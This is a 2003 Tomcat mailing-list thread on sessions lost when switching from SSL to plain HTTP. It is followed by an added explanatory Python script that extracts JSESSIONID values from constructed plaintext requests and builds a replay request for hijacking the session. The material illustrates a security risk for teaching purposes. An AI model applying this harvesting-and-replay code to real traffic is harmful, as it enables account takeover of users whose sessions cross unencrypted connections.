Hello Andreas
> if you only want to protect the data that the
> user sends to the server...
I was getting users to log in using SSL, and then switching to non-SSL in
order to avoid the SSL overheads. (When I decided I could not 'hang on' to
the same session, I decided to stick with SSL permanently.)
> Have you tried to encode the sessionid in the request-url with
> response.encodeURL("TARGET-URL")?...
I shall have to dig up the code to double-check, and it may take me a while,
so please bear with me on that.
Regards
Harry Mantheakis
London, UK
> Hello,
>
> others have commented on this, but first of all:
>
> From a security point of view it is a bad design if a session gets switched
> from SSL to non-SSL or vice-versa. The sessionid is always part of any
> request. So anyone observing a non-SSL-request can obtain the sessionid and
> thereby "hijack" a session that seems to be worth protecting. But if you
> only want to protect the data that the user sends to the server, it _might_
> be ok.
>
> But now to the point: How is the switching done? Have you tried to encode
> the sessionid in the request-url with response.encodeURL("TARGET-URL")? Does
> the problem remain?
>
> Greetings
>
> Andreas Mohrig
>
> -----Original Message-----
> From: Harry Mantheakis [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, 12 November 2003 16:37
> To: Tomcat Users List
> Subject: Re: Sessions - SSL
>
>
> Hello
>
>> No, not at all.
>
> I found that if I redirect a client from SSL to non-SSL I lose the session.
>
> Harry Mantheakis
> London, UK
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: [EMAIL PROTECTED]
> For additional commands, e-mail: [EMAIL PROTECTED]
>
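Andreas's point is that the session id travels in every request, so a passive observer of the non-SSL leg can read it and replay it, whether Tomcat carries it in the JSESSIONID cookie or, after response.encodeURL(), as a ;jsessionid= path parameter. The script below is an added example, not code from the thread or from Tomcat: it runs an observer's extraction over three constructed plaintext requests (the session ids and the host are made up) and builds the replay request an attacker would send. Both carriers are harvested equally, which is the caveat to keep in mind if encodeURL() is used to survive the SSL-to-non-SSL switch.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of plaintext (non-SSL) HTTP traffic, as someone on the
# network path would see it. Host and session ids are invented for this example.
CAPTURED_REQUESTS = [
    # Session carried in the cookie Tomcat sets by default
    "GET /shop/basket HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Cookie: JSESSIONID=3F2504E04F8911D39A0C0305E82C3301; lang=en\r\n"
    "\r\n",
    # Session carried in the URL, the form response.encodeURL() emits when the
    # client presents no cookie (Tomcat's URL rewriting)
    "GET /shop/basket;jsessionid=A1B2C3D4E5F60718293A4B5C6D7E8F90?item=42 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "\r\n",
    # No session at all
    "GET /shop/index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "\r\n",
]

# JSESSIONID inside a Cookie header (may be preceded by other cookies)
COOKIE_RE = re.compile(r"(?:^|;\s*)JSESSIONID=([^;\s]+)", re.IGNORECASE)
# ;jsessionid=... path parameter, terminated by ';', '?', '/' or whitespace
PATH_PARAM_RE = re.compile(r";jsessionid=([^;?/\s]+)", re.IGNORECASE)


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (request-target, lower-cased headers)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    _method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return target, headers


def extract_session_id(raw: str) -> Optional[Tuple[str, str]]:
    """Return ("cookie"|"url", session_id) if the request exposes a Tomcat
    session id in cleartext, else None."""
    target, headers = parse_request(raw)
    m = COOKIE_RE.search(headers.get("cookie", ""))
    if m:
        return ("cookie", m.group(1))
    m = PATH_PARAM_RE.search(target)
    if m:
        return ("url", m.group(1))
    return None


def harvest(requests: List[str]) -> List[Tuple[str, str]]:
    """Every session id an observer of this traffic would collect."""
    return [found for found in (extract_session_id(r) for r in requests) if found]


def hijack_request(path: str, host: str, session_id: str) -> str:
    """The replay request: reuse an observed id as if it were our own cookie."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: JSESSIONID={session_id}\r\n"
        "\r\n"
    )


if __name__ == "__main__":
    for where, sid in harvest(CAPTURED_REQUESTS):
        print(f"session id {sid} observed in {where}")
        print(hijack_request("/shop/basket", "www.example.com", sid))
```

On the session being lost in the first place: Tomcat marks a JSESSIONID cookie created over an SSL connection as Secure, so a browser withholds it once the client is redirected to plain HTTP, which matches what Harry observed. URL rewriting via encodeURL()/encodeRedirectURL() gets the id across that boundary, but as the example shows it does nothing to keep the id from an observer of the plaintext leg.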